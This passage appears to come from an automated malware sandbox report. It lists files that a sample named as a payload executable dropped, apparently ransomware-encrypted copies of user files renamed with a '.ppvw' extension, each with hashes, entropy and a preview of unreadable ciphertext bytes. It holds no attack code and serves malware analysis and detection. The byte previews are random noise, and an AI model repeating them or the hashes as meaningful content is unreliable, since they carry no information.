                                                                                                                          Preview:QCOILIQ.1h....^...e....n@._.\.R.3..........<.N..;o.1.;.....9.%4.\.Z.W.Ev:.`..[...".....F.1....~..,z``._..A.\..wZ.8.I..cfY..4..CD..+....uQl...Qz.gP(S.2...$.i.c...Q..r.l.wy+.....$sb..` 3.........Y}.N.'....J..A...C7.V_w[l#. "."enc..I.mt...y...?..xt0)s.n6L..../u....,fBtP,....}......U..H...Z..>..@......H.@.....Z"il._r.dZ.4j..U.#....B ..........V...G..]....WX...y6}M.....5#...5Sko...b..pg*5..c|.n.....W..I..i.k.+..a.a%pA....-.`:`O8.}lL.n.9G..Q.HV!gj....Wy.0......+v.Q._;.8....y..."`..Y..>?...c..p.L.~LS...B+..YHW@g./,.8..........v?Z./.i....g\Fd........o.{fx{o../&)....n.{.:..x.&.dIl{)q....5.rH,D..F..,J`T....u.^y...d..D....s.....m.........A./...0...t.[8p......7L.rV.3..2...8.f...!.aX..SYfFcb.....P..kwc5.P.a...5f&.Tg...\.K..K..#f. m._./..1..z].....L.KS.R.....j.v.Q...R..m...S%.*....P.s.6w.J......n.....E.~.%..wA#..D..k....%..f...*#.2J.Jt...;u...Gmc.uw...0.;..Bs...e....z+.R.w..U.3..z.|..05.R..K.!..Rx.PY...gF.......Z..UP..L.c.;a..Rz.F......_F2a.<r:.

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\UMMBDNEQBN.docx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.843766902753094
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:o6WcUohSLov2Lp3A7yC5ROaCPZ19h3NZ6o/BpRM9NJ4g/xLLfVaigLktbD:o6WcU/L1AWC/OaYfNtBpRSTLfMiSiD
                                                                                                                          MD5:4A2E206EF66967C372424524B6A7568C
                                                                                                                          SHA1:2B4AAB91BA72DBEC1DE44CE78955E4D174DBE1CC
                                                                                                                          SHA-256:DFDA7EEEBD4CB03CD48EE93DE0BC2F362469C306DDA93D149BC389801C6A0C17
                                                                                                                          SHA-512:5E2870FF53569D6A04B9F77226CF4EB891D8B5CBC5786DC453053F731909B4E33568149DDC9B598AB8FB1FDFB07C2A2A77C8BFB9536141B89F7A9C61A3C4F004
                                                                                                                          Malicious:false
                                                                                                                          Preview:UMMBD.b@>.i..P...........,...,...)..#.bx'..+..>....G....Df#..u-(s....=.d-.d).........?!*........t...,;.O`._j..Z`..\...Z...r.{..e.E.j.zY.%.1m.Lc. QQTS.Q..v:.4..._h..&)D2x..p....x@8.........C!...g8..>>......U.%8.2.-.........\%.{.Y.....B..e..)..o&......D ..K..L...4A.N.....s...o*..E.<..2.S.2.29..._Ge........;..F..))p.....b.9...<w.[..2..9.$3......g...vs.....#.......5r..8h.#.I3Yz......R..pZ.../).k./....|T.F......+.....r.....hq[W&..O4.......1....JH.6.eN.m1....}.P.~Z\.#.cZm......sn.[M(....S.4.............."*.W\I.....3.Co.b.^...v...3.._j.5u..R.j.l..%.V..N...G.......y.....!....J.kCJ.?7LA^....y......+....y.u2.....<...J....=_.j.....r.5'...$......0......B.^^.C...TG......>..9-q....r...n...R...]o-..,.z.J.f.q......5.......1.G...P.iw....2.s!...H.....bK...F.....,.t...8.y.z....:.]=tS.v.......'t.v!E...o~..q.......{.4Z..j~.+.#rl.I.qV4h......d.).....s.#..2..3.....G...1 ^.......,... ........s,..?z......6{3..B...1...P%*0.|.c....Y..{..2.:....4.G..Z.....

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\UMMBDNEQBN.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.832474904227644
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:OpsJQW/5dSsGVkjFaXrqGNyObIvucPGxpSlzeMkVhAQsDc3sLViED++bD:ysuWPTaLgcIvuAC0lzenVh4w3WJ+8D
                                                                                                                          MD5:F70C48B8AB9EE885BFF4D1EAD0AC6578
                                                                                                                          SHA1:6EA84B7F0460043086F28BC4EDD1728AF37FC3D1
                                                                                                                          SHA-256:93DC5A1048604698C6EBD6E3BFFF9B89FF89E40CA410FC60E706947EE98CDB7E
                                                                                                                          SHA-512:CE97266B7655C3226E698AC7C62D428C2C67F9CEDF8AC24B2F70BFEA848CD48D2AA3562AAA969BB28993BA2D1F43FBC59AC69CD4FA6F00C0F08D3E4B428476C0
                                                                                                                          Malicious:false
                                                                                                                          Preview:UMMBD`.>......).i/5...t..E'....|.X.@...e!...\"*..l........ Qb.n...&..2..|A.,GR.x.j}........%...]Mi.Ae.....aW..vm...a:...ZSQ.8y......../0.r.xq..=.#...Z.s..H[......h.....6.lO.)N.6m.b...;>.[.......r.k=T..y D.'..}u...}B...m......~X..]$|s.}(.*2u../.Y..>HLp\..|..Nd.f=\.......u..05....N|.h-m..3..Ha&Lb.... ...@.G....Lk....}.n`.M.S...).....d...]l.;K7....Drf.....?.....v@_......=...>..L..y.....uO.*.?*..&..yNA..".Mo..Y..7.TvW..TY.;`.B.....gs..N.@CK....j..._..u..-.).u..8.(.{....q...E.~...F.....[.~RQ?..Z[\....~}....Q6E..P.#g.h4.....@.N...-q..<.e-.P2Y...\.........".....9.Z...8...wCU...Y...3......E(T#.zs.|...3..W.z.qJ..n.}.P....a%:H....0/..(.s2#..v.h..)!.4..$.L.~U.....~._.v8.[X..OIV+..u.t.Nn..3A.U..*...vN.x.ap.....g.CC..W.;..=+../.8.W.5}...>..o...8..W'..=3..inS..hp....a.8H.K........T.4.LU.F.!..V.Z.i.3...Zk.xz}...Mj.D$..E..X#m.0).....@..0....[.p....3....w.W...*...4'.jG..E..`Pv.qZ.PB.>Y^......#....m.......d...... .Z../...G^Z.*.h.j?.........T.

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\UMMBDNEQBN.xlsx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8660205828661836
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:1gBIMFYIQopbqHX3dEN7hmL2FLnLrGfpQZMtRin6O2kAkTJkXfMUbD:1UIMW5GS3LL2tnLGQWtR3LLEifM+D
                                                                                                                          MD5:8757A0C1CC9F35DBF50AE98D10576382
                                                                                                                          SHA1:A8869CD390C3E9EB830899DAC918715955F75DEF
                                                                                                                          SHA-256:371429ADE7567FD52A46068E4415783174BEADB366F0FEA971C2CCEC0B26C05C
                                                                                                                          SHA-512:FD1F281C72BD5429D34C0428E708F8AFA0C1F7EF9EE1EC9227AEFA4B8ACA5DDD9C7ACE61B19361F2CF22B4648DAA841F02D158B1EA1B72E85E0131E1CFD671A1
                                                                                                                          Malicious:false
                                                                                                                          Preview:UMMBD......x.".:.>.'bE......;.:.|y....az............. .2}.i.$..?>..E...,P%5.s.ls.q81q.B]..i(..).. 7S.598.`.@_.C.N..f..$....C.&.r.0.....x..n..(.y..:.._..Sk..+."N....Jb.h.-.......>.~.y..qj........oZ.;7.pbFd...@C..)l..B.q..jL7..{b...b..a9...#*.z."b.|....lUUZ..8p.Z..j...9...c.(.E.z.]...+...1f~c.....IV4..W...g=j.=.=k2.v^....[.Ha;.'B._..RC..\...{F.A..>...rj#.....!X..9...5.....x.M.z....Z...YC..)'...F.`.W...Xx.XE.c...V<.S_DC..g.?....>/.k...x..~.n..O@..X=PPA....XK....}!6...,~../..8ju.rC..K.&...L....V.N>.p{X.bA..W...`Z6t.u6C.*..Q....n...0.7.D(..........RQ3{.o...y.M......os1..{^r. ..l.Q.~[...u._.....t....=d....1....{a.....A..=|..xf.P&.x..8k!..y.....H....."s.o."....i..<..Q...%...n.....0.H.Q./.....r;....z......FL.<....o......0.\.B.=.'*i:w+...m..v?P.|.~d}. ].;.I..M.k..%.=..J..wB.Y.cLy..[.sg.4kJt......%.~.,v..p.'....YTH[.b=..YW.... O.X.@.....2.....M!R....6....=vv(+Y...XZ%<.U..G...NO.%(..U%Y.\.e.8...m..o>dr.z.6...u5........>......5X?..Fm...._3.N.p}..-...

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\UOOJJOZIRH.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.836940222827568
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:m1PF+GW3PwY2qfASZD25LDqaqSC3cOPJH91EONLNKZ6tsQGbD:yPFHeV2qfASZD2tqbF3cKdnN2HD
                                                                                                                          MD5:7595BE6B5C8E2AFA624C0AC376CE9869
                                                                                                                          SHA1:93EC6F98F34558F50BD4F994807BC87D7F25D65A
                                                                                                                          SHA-256:B714F4F76F24844247E1522C0C0068046CC8F54227B0814016FC0C2CC872731D
                                                                                                                          SHA-512:8A9BD5917E3509D2E0A0285C25B0A84408CA37DB019500D29E445AD334D4809BC255214C4ECC6B9BDAC20C8A941EF9F4305BE4B707802A76369BB470D2662B0C
                                                                                                                          Malicious:false
                                                                                                                          Preview:UOOJJ...$#v.~..v..O_A..r.EL<.sT."6z..s..T..y...}Q.fP..zC..w.bJ3.A.\y.Z.2b[..0f...B..W.t..z.\.n1}.....R......$.,k.o.:.Obj.%..F...r-es...i=.....D.....`..t....Y.P.!*4k..'.}.qa:qX..........J.4J\..4c.h..~.b.h......*....G(....$..0.S."C.....C......V....p.H<w.).OY.@..n4g...+.....+.[1..l5l..[....@..M%.D...T... P..L.O.$..../K..F..9......G=.....d!vS.....*$Xj.N...Uv.qT..@...,..u.2&....K..$M.*{.b>~I[..,.v..jc;....x...r.N...j".2S...s._..7j..%..MFM...+.4.w}...#...........KS5.}.(..:7.8Mr..c<:.(..M.....$-.........p....G3}.@@...M..C.]ED:.;..=P..+,.;.T......N_'..P@L#jt4..ad.....CO...1-^....?b...DzORe...;PbVD.2..-s6^.(Nr*..<.g...C&...4......c.Rf.....F..1...a.W.x.R..f.`..^..K..O.D)G(+.....H..@.6.......1..P.^.8.]2....k....%...iGM.Q..-e~l.S.Xs...7.b.3.q...,...63....x.N.>gRua.'....?C...%.2[wA.....K.....g..n.eI..o...Ur.:.J..`..|G].'...J5%r..~de..^~{.?...@.3H.J>.ucC.q1.[....*.l.l....._/.+t....S.[kj.u_>+.4... .m.T.X..^.v.S..a{F,....|...>:H.....F..@.NAS.c.@..>....zj

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\VLZDGUKUTZ.docx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.830619532244673
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:z4AwK5VREtEvIoiiKq3VGN5qajVIUrlnIhs3cNBFdpK295cHe3zwbD:UALEmQoiitFGN5ZIenAsMbFmN6qD
                                                                                                                          MD5:EBC804AEA88ABA48A4CDFFC9119A0BA7
                                                                                                                          SHA1:ABBEDA370F4A7169C769720DCFEF1CC45012B30F
                                                                                                                          SHA-256:66C49381DCCA3908A73265880E8B1FFA47177596EF9D2D6E04BD28B866449C5B
                                                                                                                          SHA-512:3563D64BE645C13137685DF3B49D9187ADDBE22A69113F0ECF1B19730BAD09571C47FF21FFFBD002A68AB4CED020CF54686B4F060C95DE4468EEF0C85CCBEB2A
                                                                                                                          Malicious:false
                                                                                                                          Preview:VLZDG._.cKw/J.<....e.......2./].=qdy..r...7tR.3..v.....%n.0....BI@.I....6tN?..x`f. n.OO._.i)G..1).-.....x'u.Mar....H.Mr..r.f....!..|..J...ZD.>O....N.S.K...e.+F.G.7..{...b........5k..2^'...h.u...Q.GA..Nq.....c...$f.....&~.}..s..9...J.Q.B.h....<.5.......V_.G@j]w..."P|U0.6.:k3.....FN....Z)..x5.^D..Wg.CS.Q..*?..Q.....5O.0.N..ojh...Y.u.........r...........'..[x....A.......-Pr.O4.e_..lFR..vm...!'............#...VM.#A....U.......l.K....As3.h.14.....{.......O....1... ..2.E&..O.Q......E..Dt#-..t.Qp..f#i......_.I..'x..YEg..$..y..@...c..........b..,u.M..G...?.. +...L.Q}.2.0....t..D.O5....W.-=Q..V..............:...z.$.i./`.v$.....tk: .0...@.z.......o.{..v.............$.C.d.!.U..4H.....7...-gFqN..M..?..,..."...L.....e..1U...>.O.......wNP:...*...U..N...r[!..V.A...%.*.@3l..mu...C.-.S....wev........7nO.u...l..K...T.-. ..oy].~5.f..... ...).x....7{).`.... ...`^.fs.e/<.G.>K.3b.......{...<....;`^4....}n...m...7....^..P...b..O..CU,..W./....,.y...

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\VLZDGUKUTZ.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.856734222510161
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:76/orOdTVV9T/rEv2SjxHD+6XaIsAKLE43TtOTWYn0o74OgUFlEMbD:egWpXE3D+6KKs2nlgcltD
                                                                                                                          MD5:2D97D04896AC8160AE27BA3E6FFE8B78
                                                                                                                          SHA1:9C8976E4DEFCC7986ECA7CC9AFB0F4184F6BEDC6
                                                                                                                          SHA-256:2BB2766747B9B4A77FBC27A4BFD9776342D0A48F2A6FFD4A57CEF52A90C29515
                                                                                                                          SHA-512:9381B4253D4FDF124575F2B2960ACF199A35172A3E8E0CE247E757DAFB3A22CC585E99FAB3958658E7371A5A811F7EE29A57CD07A339A0B42927A7D998DAACAF
                                                                                                                          Malicious:false
                                                                                                                          Preview:VLZDG....Q2.'.+..l..z.r.../...J...!.m,.....R..~3..Y.2....[.;...E.....i/.=.....+........i..[?? .:^c2...t=...K.)..QJ.:tq.*\q...x.r.|..d..V8...v../. ...=..n.;..R.9.......9......v....X.|...Yi.g/.qjk..Fy.l.....#&].......y5...-.Hz@~....'.....s,..%uf#. <......)...,H.~.|Y..........s.).....?s...-.-^!.+.sR [..P.w<.9E~.Q..W..L3:......>.:.@.c.6...zK...... ...%.w..^l.c..`.......<,.T...{vx..Q.....:....83;&......<+.,.;..|iO.D..>...O.....J..7.V=&+=.=.."u5.%.chp.F{C.j..^....~.qY...?....".A..Z....)FQ0\..O...Nk.~..q.........aY.-.!#i*:M\T.T........Ec.;.5.7.,.Fu*6g.^h...P......t.B.2.X`t.....1..."..^.A.b\.]9..&ZJ...b..4...v.%#......iC..r..?....E\.t....i..v8.U.I.I.%.~ ...Y.5.%zT...xI....s.........?3.$@....R]qn.&L..^[d....1.0|H..Ty.l..y....Tvhd...#s.[.eJ.n..v.h}.....d..6R....@G.E ^.A.....g.../.b..[3i{..,..-jH..D.l......t.."..ji..m0H)#.')......V5..J..T.. ..!q.......f...=..w].....&...Z.#..%_.!..1Z&L..G.g.t..*..T C....w.w.t. ....=.m.V.@....k.l.".......z.m.....8m

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\WKXEWIOTXI.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.811972039271056
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Ymmjdoln/zI/cihlGIivBVRoHNSqIfDrb7bXLeXGashDOfz36rHVAGbD:KdWnUjG/vrRoHGXvXLeXzqKLwH9D
                                                                                                                          MD5:FFFE37E6815F84A8ABDCEF4621838E9C
                                                                                                                          SHA1:2D1C2B0E478753BFFD6D9B593A88875ECE6E6636
                                                                                                                          SHA-256:F924D089E4038AA71DF0C33B8C3DD4FECFB55B35577CCE6DC1450411D1C22423
                                                                                                                          SHA-512:11EDDB54858AAFA00F3AFD157921C23DA1A9CD575ABEBB4701B892F1AD73BB1E1EC5DEC379406F87A9DD84AD09BED717DF64142C2DDA2BDF41C40ADE80E77B4A
                                                                                                                          Malicious:false
                                                                                                                          Preview:WKXEW.;......%4l..U..9_.>.9J.?..u<.qt.m..,.......Nn%-...Z.#Z..?.A.A..(.vk.....H.{....i#iLb'......f<+...vi...:.F{.!M|.22..6G..u.^....M.t1...?....W....D......FR.9..[[.....cxfp.5..j.^...ar..N.PC.M.=..zp~Y..N.....k.1._.L........]..z...}K.....?/.:.i).mDF.........l{.jf*2...F9q.Z7.N.Pg^<@'.......8QmX[.p..2.7w..J...\.p*.yR...K...y.1.%B}|..Q.!>H..-/3.....+.p}.Z.e.......NS=....{*..m?....{.#..p../V.76.}V.S...9.L.H....%...z.>.=8..j..;...f...p...p..T..7...8.r&..Yr..kM.t.\R.j.[h.U=3p..N...y.......\L.%.lE...G...a^k.a*..F...9.Y...8..f.Z.K|.l.._...@.XiAt.w..'...GL't+7..{.o.C<.........n....v#|4q4._.sS.?.28....J..I5.....l.i.&[(5...\..E$6"..'.>.n..I.SD.4.B...2b'.vFu*=(....}..J..U`.an..FB..b..K...[...b.WJ1x..3..<.^.c....).z.M|...).u.e?{.........ue...W4....r.t2^.. ..i-H...R....S_......g..!.8S..Q<..@y..8.4.{..H_..\}Q..9.J.c......}.....f..{...u..g..S.:b_.-v....7.n.q?.q......U}..%...et0....?^P./..-..,.:T&..!.<...A..bLt...=.....n.`r........O...iC}..\..j.&$

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\WUTJSCBCFX.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.82580670006501
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:99+LRF8MIhkJGG+WBi+aSj3EoRMIUkGz+hZXHcm7WL9C+GPWs3/cckLHZIjbD:MRFjXj+GilUKBlzcZHW2UcUZyD
                                                                                                                          MD5:449E3CC81BD545C7344F255C9EE94AD6
                                                                                                                          SHA1:F9010DDB4B2E6FD1568E133401AC21A4B4923801
                                                                                                                          SHA-256:1A2E9C35AF478BB4E84F1AE5EBAF94702D52BAF764263548C9310DA6EE23FE72
                                                                                                                          SHA-512:23368F6CA3C49C79219149A306EB40557DA562E55BB8CA69E2867A668E51CB6A3E2DD99D26B470AF007E90603AD4B9857DB2839DBAE5209E74279043B4DA0C31
                                                                                                                          Malicious:false
                                                                                                                          Preview:WUTJS.i.H..Y.}.Z........U.7...^Y....*.n.... ...5J)..O.QV.4...o.-.|...~.....l.K....t....'..7C..Wm?eO..]=H..}..0y.c..%.&%.K.........'.B....nro..&O....._S......u...I..u(..`..../5....m..-W@.......u@.U7..fuuu..P'n..y...o...2A...f.Z,..i.Cz.}$s..C..;^.?....._..3.Y..`.~..C/<... .g.y....@.......T....f..q=.......\..6 W.,.3..$.......<*...4>z...Ri..z=E.#X....C.@C.._.8. 4[,.|..Z.K.. .F.."..'D.'.m..}AZ..D.9...K.%...d`&..e....i.B.....F..8~.....|}).EfAC...h^.Q8...._.......H..G._Va.$H.....,.G...a.....i..S.z....B.?..}m6.......,..}.....T...kq....QZ......'.k!..Z(....,.....c.&D&.....b.cx..P.n..x...<.. ...b.ae4..i.d.cF[.....4k"...%..u...........9.i..D...C.H.>.....;...bN.....r...*..,L..[.. _.Vd.]K.p....h{1.I.8.<..|.@.n.kg.1.\K0"...0..y.'.:b..=.D..D_..`_.d.E5?#Wb.....G..9,.........<T..H.h....S[..L..%1d....'t...M......P8..(0.=.A.."...}"....*R.a..q9.:..nV!D..4.J.y.........\...w...m.5\....I..=t....{s.....@'...fG_.ze|-..^.18.=G..k3..4.)..Un|..}.g.iEu.z.....|

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\XZXHAVGRAG.docx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.839041912243269
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:DvvOwua/v7H3Gs0Yeu5mzQEGCx3xSWh11SuIosm6/TNXbsjHbD:7vOwJjGsFJmURCxBSWU7osm6/T1bu7D
                                                                                                                          MD5:0AAB5CC1E8F5C53F86D8C3F28971177C
                                                                                                                          SHA1:55963E410B8E3F667541EDF7D9288DD53C4529FF
                                                                                                                          SHA-256:13BE38C60AF97E9D2C6419BCD90F9A73D67184DE7976CFB6DE2670D00FF97C5C
                                                                                                                          SHA-512:6AB34027C8C47FDBAF2FF530F2B88A6629096BE60A67C75914D229FB0187393F76212A34001671D85573B3066BFF8282F7B6CCF9586E96754743264383DA7280
                                                                                                                          Malicious:false
                                                                                                                          Preview:XZXHA .*....P]....2+H...U.?m4J|.t.....Q|..J;3...G..N.2.......2...c5y.lv;.t....~.{E.Y.k.4...jd...Z.[..0..F.5..S.{...jlK8.7Aazn.uJ.4..\.A(....EBi.v...(..>ma.;.c..... \ .I....7....}.m<..v..vRs........4...y?....%.u..E...A>...i.q..gE.#u^..C.:.S\..u..I47;.6.B.%tG.. ...uj.6v.b.}Tu..Rs..f.f..KVl.mEf..cyb...........w%4..b..N.l..-.'.......kU.[{.o..a)........l..20.A.U...Rs..qJ...}(...fW........HW..<jT....r.O2v.n:..3...j.......g*Y*C...[.......a..R.s'.%.F..6.:C.<.t..e.c+.Q..f.......!.r.......~.a(}...{........k.......5\..>...C]0..(.Z..|..W.U....*U.(j..Zb......,......U. ...q..[..K...;yiD...!..D.p.*. .. ...._.38.93...w.5eb..`!..{.c.....x..Pq.Q.!..bs....._a._K..vn...C.......E...v....(.^.n..f..R.#.....7.=.....g.h..oi....*.z#.1.V5......._......>....:..W...t2..@.........!.+.{B.A)mG..s.L...}...&.#.x._.2W...o.......>....6.N.....f....tDtc..N....C.y.W6.^L3.D.=76(.A...p....>..k.'..T.y...r.......`..Y[.....'.. .\....bD..0.1CS.l;'.....t....Z....._H...^..E..Pe...

                                                                                                                          C:\Users\user\Application Data\Skype\RootTools\roottools.conf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):410
                                                                                                                          Entropy (8bit):7.378100604772861
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:YEoaz+ThuyS5HGM7IC2SpHIv1jce+ePBtLq5bTcii9a:Y9aEh9jUIdas1jv+ej+bD
                                                                                                                          MD5:A2EB561988EE85149BC0D01413F557E5
                                                                                                                          SHA1:4938F798B6EED37106E6C683C288954EB061EEA9
                                                                                                                          SHA-256:87C328892019C36B20B9325C523DA6112539EC3569E7DA2F7C219A79AB68D8EE
                                                                                                                          SHA-512:DC281AD99DFB5F5D0E713A8D19EC47E834F3A194FD1031E7B3A651E29ABBB713289F0151945F72EB14062EA91DCD78E148502CC2D13B656FD1FA031C0E702815
                                                                                                                          Malicious:false
                                                                                                                          Preview:node_.......M.".8.nhge.k...@..1...5NS.X....z.............(.I.D&......./...3I.@...<.by..TN....C.N.&.....j.q.1Aq....Y..N.G5.c..B[....+.NUU..z:,..j...X...z.)..`4...$d..;v....s1.f..x...LZ...+.......j!.Mf...9S.=.......1.*6....h.v....j..U...p"...n.cB.l....B.th........C...mG..X.......7fB-.:4..;rL....DC.t...$.....(d..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\Desktop\BPMLNOBVSB.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.858191859807277
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:35rtXlShp3Kl8Gd877/Z+ctSvCvb3FPkiBZVsVjhqEegxS4xY3U2ReObD:3Ihp31DvbVP7B8jh3yuYRrD
                                                                                                                          MD5:BD7AE48E941C082D6FF1BF77E33B0471
                                                                                                                          SHA1:78052B7518AAE60C64E176FD759FED014D4BCFC1
                                                                                                                          SHA-256:36C4F836524286CD4D9D2CC97B1CF3FFC5E9F03C39CD3DEC761C4AACCB813DB1
                                                                                                                          SHA-512:00AF69CC3B0B4C955023F2F8679D1928A295FC57D189C21CAB9DB6001DD2868B68F383AB696FB42A3F6934003F401EC9FDA210362B13980176700CF56F7CFCED
                                                                                                                          Malicious:false
                                                                                                                          Preview:BPMLN...b.....Q.......x.....m.H...q...z..@.<..,U....^O).."..M.....a.l..G.p..^.B.&E.x...n.3.l..8.G.'.w......h,...M...v..N..G!..._x....0j.x..w@...?..v....G.y..u{...#`.^$.n.*.]......z..v.@...].rS......^..mq2;-.^.g}.na...t._...]gm8.?;..T.{.EQ.=;..n..d2..JF..z.0O.i..t..b.[..PK...*>.e..R...c.B..E7<.....8.;I..q^....Y.zt.........&....c"O.../..H.#.!R.2Y.m....>.u..H..`.z.7Q{..?%...[U...k.?...p.Q..m.o..~...z.Ad......#.f........%K.....#'.<....j...e...^.e[..'...\|g....?...I ...e..)..f.v\J.X.w.m..l.......u......%.B~...b..@.9.rM.].8H.>....L.&.......T...j..mB.l&.z...'....GO.8...|./..Lg-F.......y"@.}t....sT....8x1{!..3B...%.4I....b..R.4.W.{.T J.............U....[.^h......g.J...)..t..H...}..Y>..>!..a.1..J-.%.r..*..2./...?.s.....8.=IA..\.l...<...2../p....~.1.[..2...q..N..LCU.e......5.F.au.i...j_.T.mz.#Bb8..m...%..I"..v....}..h..$....1.].....1.....D....7...VD|'c.:X*.._..G..WO...>:Z..........:..1..jR.rx....nGB........v..[......Y.9..q]C....5`8A.u!.Y/...

                                                                                                                          C:\Users\user\Desktop\BPMLNOBVSB.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.858191859807277
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:35rtXlShp3Kl8Gd877/Z+ctSvCvb3FPkiBZVsVjhqEegxS4xY3U2ReObD:3Ihp31DvbVP7B8jh3yuYRrD
                                                                                                                          MD5:BD7AE48E941C082D6FF1BF77E33B0471
                                                                                                                          SHA1:78052B7518AAE60C64E176FD759FED014D4BCFC1
                                                                                                                          SHA-256:36C4F836524286CD4D9D2CC97B1CF3FFC5E9F03C39CD3DEC761C4AACCB813DB1
                                                                                                                          SHA-512:00AF69CC3B0B4C955023F2F8679D1928A295FC57D189C21CAB9DB6001DD2868B68F383AB696FB42A3F6934003F401EC9FDA210362B13980176700CF56F7CFCED
                                                                                                                          Malicious:false
